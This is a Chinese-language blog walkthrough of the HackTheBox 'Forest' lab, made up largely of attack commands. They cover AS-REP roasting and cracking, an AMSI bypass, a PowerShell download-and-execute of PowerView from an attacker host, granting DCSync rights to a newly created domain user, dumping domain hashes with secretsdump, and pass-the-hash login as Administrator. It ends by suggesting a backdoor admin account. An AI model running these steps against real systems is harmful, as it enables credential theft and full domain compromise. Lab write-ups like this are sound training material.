发表更新penetration Test / train6 分钟读完 (大约831个字)

hackthebox-forest-202

hackthebox forest

forest

port scan

使用rustscan扫描后,开放端口有389,139,445等。

services

使用windapsearch对ldap服务进行枚举

1
2
3
4
5
6
7
8
9
10
11
# 检索所有信息
windapsearch --dc '10.10.10.161' -u '' -p '' --full -m custom --filter "(&(objectclass=*))" | tee custom.allobj.txt

# 检索用户信息
mod="users"; windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"

# 检索组信息
mod="groups";windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"

# 检索电脑信息
mod="computers";windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"

windapsearch custom filter windapsearch users windapsearch groups windapsearch computers

过滤检索信息输出中的用户名

1
cat users.txt | rg -iaoP "(?<=samaccountname:\s).+$" | sort | uniq | sort | rg -ivP "((healthmailbox)|(defaultaccount)|(331000)|(sm_.+))" | tee ../0817-forest.htb.local.users.txt

rg grep windapsearch username result

使用impacket-GetADUsers脚本进行ldap检索

1
impacket-GetADUsers -all -no-pass -dc-ip '10.10.10.161' 'htb.local/' | tee ../0817-getADUsers.impacket.txt

过滤检索出的ADUsers结果

1
cat ../0817-getADUsers.impacket.txt | tail -n+6 | awk '{print $1}' | rg -ivP "((guest)|(331000)|(krbtgt)|(sm_.+$)|(healthmailbox)|(defaultaccount))" | tee ../0817-getADUsers.impacket.username.txt

impacket-GetADUsers rg filter GetADUsers result

使用impacket-GetNPUsers尝试根据用户名,获取用户AS-REP hash

1
2
3
cat 0817-getADUsers.impacket.username.txt 0817-forest.htb.local.users.txt | sort | uniq | sort | tee 0817.forest.htb.username.ls

impacket-GetNPUsers -dc-ip '10.10.10.161' -no-pass -usersfile './0817.forest.htb.username.lst' -outputfile '0817-htb.local.GetNpUsers.txt' 'htb.local/'

impacket-GetNPUsers

使用john爆破svc-alfresco用户的AS-REP

1
john-Rockyou ./0817-htb.local.GetNpUsers.txt

john crack AS-REP

获得用户登录凭据svc-alfresco / s3rvice

foothold

使用evil-winrm工具,凭借已知svc-alfresco / s3rvice凭据尝试登录,登录成功。

1
2
3
evil-winrm -i '10.10.10.161' -u 'svc-alfresco' -p 's3rvice'

*Evil-WinRM* PS> whoami ; hostname ; type user.txt ; ipconfig /all

evil-winrm

get user flag

priv esca

svc-alfresco用户交互shell中,进行信息枚举,发现svc-alfresco用户在Account Operators用户组中。此用户组存在DCSync攻击可能。

1
2
3
4
5
# 将evil-winrm bypass
Bypass-4MSI

# 导入PowerView模块
iex(New-Object Net.WebClient).downloadString('http://10.10.14.22/0-bin/PowerView.ps1')

import PowerView

Account Operators Exchange DCSync攻击步骤

1
2
3
4
# 添加一个domain用户 gvest
net user gvest p@ssw3rd135246 /add /domain
net group "Exchange Windows Permissions" gvest /add
net localgroup "Remote Management Users" gvest /add

create a domain user

1
2
3
4
# 给添加的gvest添加DCSync权限
$pass = ConvertTo-SecureString 'p@ssw3rd135246' -AsPlain -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\gvest', $pass)
Add-ObjectACL -PrincipalIdentity gvest -Credential $cred -Rights DCSync

add domain user DCSync priv

使用impacket-secretdump以添加的gvest用户dump hash值

1
impacket-secretsdump -outputfile '0817-forest.htb.local' -dc-ip '10.10.10.161' -target-ip '10.10.10.161' 'htb.local/gvest:p@ssw3rd135246@10.10.10.161'

impacket-secretsdump

使用Administrator的hash尝试登录evil-winrm

1
evil-winrm -i '10.10.10.161' -u 'administrator' -H '32693XXXXXXXXeea6'

evil-winrm administrator pass the hash

post

已经使用impacket-secretsdump dump了所有hash, 可以尝试添加后门域管用户。

hackthebox-forest-202

https://cyhfvg.github.io/hackthebox-forest-202/

作者

cSan

发布于

2023-08-17

更新于

2023-08-17

许可协议

 

归档

×